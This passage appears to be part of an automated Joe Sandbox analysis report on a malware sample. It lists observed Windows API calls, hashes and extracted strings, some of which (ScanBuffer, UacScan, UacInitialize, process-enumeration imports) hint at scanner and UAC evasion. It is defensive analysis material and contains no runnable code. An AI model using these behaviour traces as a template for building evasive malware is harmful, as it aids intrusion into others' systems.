                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                            • Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                                                            • Instruction ID: 7d9da1091af86896b311a4aefcae1897c9f67087f48b36da3be7d372dde7e08b
                                                                                                                                            • Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                                                            • Instruction Fuzzy Hash: C2D05B723081107AD220A55B6C84EAB5BDCDFC5770F104639B658C3181D7208C02D771
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,02A3062B,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,ScanString), ref: 029D8E0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 30fa6541ff96c3e5d0710b90c2cec70c33bdd6f8f4e7b3c7ff7eccc32c301030
                                                                                                                                            • Instruction ID: fee2df497545d2577d8683eb9b9888037b5bc30a63d5740b0fcef639319889ca
                                                                                                                                            • Opcode Fuzzy Hash: 30fa6541ff96c3e5d0710b90c2cec70c33bdd6f8f4e7b3c7ff7eccc32c301030
                                                                                                                                            • Instruction Fuzzy Hash: 83C08CA07012000A1F50B1FC1EC066A028C5985239320AE21E429C31E3D326A0633C30
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            • Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                                                            • Instruction ID: ea9ac250b33e65e3944edb50bb414579b27382e6a1cc1553fab8786bf01f5191
                                                                                                                                            • Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                                                            • Instruction Fuzzy Hash: E0C012B26512200BFF319A5D9CC0B5562CC9B45255F5844B1E504DB250E37098005751
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
                                                                                                                                            • SysReAllocStringLen.OLEAUT32(02A38B50,02A2C89C,00000016), ref: 029D4FBE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                            • Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                                                            • Instruction ID: f94c53811bfa46bd69720b38a6946471313918d1848c431b8071fc1302608477
                                                                                                                                            • Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                                                            • Instruction Fuzzy Hash: ADD0807450424159DF28575D4504536716D9ED134578EEE7D5C424F1E1D735C400FF30
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,02A2D4C6,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,UacScan,02A6A350,02A37AE0,UacInitialize), ref: 029D8DEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: a3cc43febdbb8b82c70b3e6b5e69f1f9d3b39444bdcc1537f45fcfbcea189d03
                                                                                                                                            • Instruction ID: 0122c265ec2d0a6fe8a2f2670a1f638c7dbd903d2900723f82970347c0fe8e00
                                                                                                                                            • Opcode Fuzzy Hash: a3cc43febdbb8b82c70b3e6b5e69f1f9d3b39444bdcc1537f45fcfbcea189d03
                                                                                                                                            • Instruction Fuzzy Hash: 69C08CA0211200079B1465FC1EC407A068C9D992393249E21A438C31E3D33690633820
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • timeSetEvent.WINMM(00002710,00000000,02A38704,00000000,00000001), ref: 02A38720
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Eventtime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2982266575-0
                                                                                                                                            • Opcode ID: 28ed8bd73b92293b91ddd49e82c63a7d9361241ac04184f4ebb90ac19da30f0e
                                                                                                                                            • Instruction ID: 35f5549f9785c265009cc27fa79612d03c3bc4ba3261c44a56bb308c5a573d80
                                                                                                                                            • Opcode Fuzzy Hash: 28ed8bd73b92293b91ddd49e82c63a7d9361241ac04184f4ebb90ac19da30f0e
                                                                                                                                            • Instruction Fuzzy Hash: FFC092F0785300BEF61056A45CD2F23518EE344B65F508821FA01EE2C1D5E68A1096A2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,?), ref: 029D4F47
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2525500382-0
                                                                                                                                            • Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                                                            • Instruction ID: 86dc3256b95070d23bb321b5878a1d4cc0207636a1d3bc39018cbd8d3fde71eb
                                                                                                                                            • Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                                                            • Instruction Fuzzy Hash: 5FB0122820C28110FB1021E50D00732019C0F50148F84E431DE1CD00D6DB15C015BC35
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 029D4F5F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            • Opcode ID: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
                                                                                                                                            • Instruction ID: 2796521b17676fb47112ef457c777267418502afcbf6b65b699010e5abb66475
                                                                                                                                            • Opcode Fuzzy Hash: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
                                                                                                                                            • Instruction Fuzzy Hash: 19A022AC00030308CF0B332E0000B3A203B3FC02083CCC0B802002E020CF3B8000FC20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 029EE99A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 292df9f93813e654f745adace593bef72001df04676ef05833f3e71ae8593d34
                                                                                                                                            • Instruction ID: 8c9408ec0f0f96c00558b139009b6627656db181d09254e257164e20c0a82903
                                                                                                                                            • Opcode Fuzzy Hash: 292df9f93813e654f745adace593bef72001df04676ef05833f3e71ae8593d34
                                                                                                                                            • Instruction Fuzzy Hash: A2117C35A403058FCB51DF18C880B52F7E5EFA8360F14C53AE9A98B386D774E905CBA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029D1A9F,?,029D209C), ref: 029D167E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 1fa8efd749deadda9ec3bee9bc52248e6b09d1d204967218c38efcb9457264c4
                                                                                                                                            • Instruction ID: d4a2be8b10f165ab26f81e4030ae3b85193b70949249694f99d76ccdcc79484b
                                                                                                                                            • Opcode Fuzzy Hash: 1fa8efd749deadda9ec3bee9bc52248e6b09d1d204967218c38efcb9457264c4
                                                                                                                                            • Instruction Fuzzy Hash: E4F049F1B603008FEB06DF799D58312BAD2E789349F14C579D609DB788EB7188028B10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029D209C), ref: 029D1740
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: ddcc2504e4bc62ec4488e6634b332b5baa9410f9dafa0fee819982725f9876c6
                                                                                                                                            • Instruction ID: 6f6d05d8e358051f4ec17273c7623116a4d62b375aff0f54eba6caf5056a493d
                                                                                                                                            • Opcode Fuzzy Hash: ddcc2504e4bc62ec4488e6634b332b5baa9410f9dafa0fee819982725f9876c6
                                                                                                                                            • Instruction Fuzzy Hash: CAF0BEB6B40756ABE7108F9A9C84B83BB94FB40361F058539FA0C97348DB71E811CBD4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,029D2080), ref: 029D17A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                            • Opcode ID: 922b3c135c5edef717642931258d06cb666244f42d712835937c44cac7dbc329
                                                                                                                                            • Instruction ID: a08d8b747ad6bbdf9a63405195bd3d3aa2c9b697f00a2842edfc980e87f5f736
                                                                                                                                            • Opcode Fuzzy Hash: 922b3c135c5edef717642931258d06cb666244f42d712835937c44cac7dbc329
                                                                                                                                            • Instruction Fuzzy Hash: E6E08C76300301AFE7101EBA4D84B53ABD8EB986A1F288875F649DB291D770E8409BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A28AA7,?,?,02A28B39,00000000,02A28C15), ref: 02A28834
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A2884C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A2885E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A28870
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A28882
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A28894
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A288A6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A288B8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A288CA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A288DC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A288EE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A28900
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A28912
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A28924
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A28936
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A28948
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A2895A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                            • Opcode ID: 7dc295d28f4de16c98614f9ff000ea6736b2993ff7a1e4e9d521134d13db048f
                                                                                                                                            • Instruction ID: 75c2f5947d47903e86142f3937240d6e6f564c3af64770947ed39a5fe7ab8c60
                                                                                                                                            • Opcode Fuzzy Hash: 7dc295d28f4de16c98614f9ff000ea6736b2993ff7a1e4e9d521134d13db048f
                                                                                                                                            • Instruction Fuzzy Hash: 5A31A5B0A84360AFFF00EBB8A8D9A6537A9EB557007004969F415EF205DF7CD459DF22
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetObjectA.GDI32(00000000,00000054,?), ref: 029F4FFC
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F500D
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F501E
                                                                                                                                            • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 029F506A
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 029F508E
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F52EB
                                                                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 029F532B
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F5337
                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 029F53A0
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 029F53BA
                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,029F5548,?,00000000,029F556A,?,00000000,029F557B), ref: 029F5402
                                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 029F5388
                                                                                                                                              • Part of subcall function 029F1CEC: GetSysColor.USER32(?), ref: 029F1CF6
                                                                                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 029F5424
                                                                                                                                            • CreateCompatibleDC.GDI32(00000028), ref: 029F5437
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F545A
                                                                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 029F5476
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F5481
                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 029F549F
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 029F54B9
                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 029F54E1
                                                                                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 029F54F3
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F54FD
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F5518
                                                                                                                                              • Part of subcall function 029F2AA8: CreateBrushIndirect.GDI32(?), ref: 029F2B53
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1299887459-0
                                                                                                                                            • Opcode ID: 3f3c347f01954709fb20429106574ffc4fb3a539df5aea5aa3819d727d4cc4f3
                                                                                                                                            • Instruction ID: ea62522f0d343a70bbcd5f1fdabd30d4663f00a7ac2b9cc48085dc368a60ff85
                                                                                                                                            • Opcode Fuzzy Hash: 3f3c347f01954709fb20429106574ffc4fb3a539df5aea5aa3819d727d4cc4f3
                                                                                                                                            • Instruction Fuzzy Hash: C212E671A00209AFDB90EFA8D884F9EB7B9EF48310F558555FA18EB291C775E940CF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                            • API String ID: 0-2963190186
                                                                                                                                            • Opcode ID: e544acce6900a9ac91b3b3dcba7b8f50f8a5d8a626c1e0eca3ce0f64a0ae1097
                                                                                                                                            • Instruction ID: 0b5c0662d7850726d713e434cdf631f89f97b4c47cb031613e045d909e0e89d2
                                                                                                                                            • Opcode Fuzzy Hash: e544acce6900a9ac91b3b3dcba7b8f50f8a5d8a626c1e0eca3ce0f64a0ae1097
                                                                                                                                            • Instruction Fuzzy Hash: DDE13835A04224EFDF04DFACC684A9DB7B6AB4A314F1581E5E9099B251CF38EE48DF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5C35
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029D5C4C
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 029D5C7C
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5CE0
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D16
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D29
                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D3B
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D47
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000), ref: 029D5D7B
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18), ref: 029D5D87
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029D5DA9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
